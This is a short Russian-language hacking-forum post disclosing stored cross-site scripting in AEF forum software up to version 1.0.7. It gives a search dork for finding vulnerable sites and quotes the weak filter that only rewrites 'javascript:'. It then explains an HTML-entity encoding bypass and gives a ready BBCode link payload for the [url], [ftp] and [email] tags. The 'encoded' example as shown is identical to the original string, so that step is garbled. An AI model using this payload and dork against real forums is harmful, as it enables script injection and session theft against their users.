04.10.2008, 21:34
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Aef <= 1.0.7 Активные Xss
AEF <= 1.0.7 Активные XSS
Дорк: Powered By AEF 1.0.
Уязвимы сразу несколько тегов, т.к. проверка там везде однинаковая.
Поразительно тупую защиту от XSS:
Код:
function check_url($href, $name){
$href = preg_replace("/javascript:/i", "javascript-aef: ", $href);
return '<a href="'.$href.'" target="_blank">'.$name.'</a>';
}
обойти проще некуда - достаточно перекодировать скрипт:
Код:
javascript:alert('Grey') => HTML (with semicolons): => javascript:alert('Grey')
Уязвимы теги: [url*], [ftp*], [email*].
Эксплуатация: при добавление сообщения, добавляем один из уязвимых тегов.
К примеру [url*]:
Код:
[url*=javascript:alert('Grey')]нажми на меня[/url*]
при переходе по ссылке выполнится скрипт.
Символ "*" - следует убрать.
Последний раз редактировалось Grey; 04.10.2008 в 21:37..
|
|
|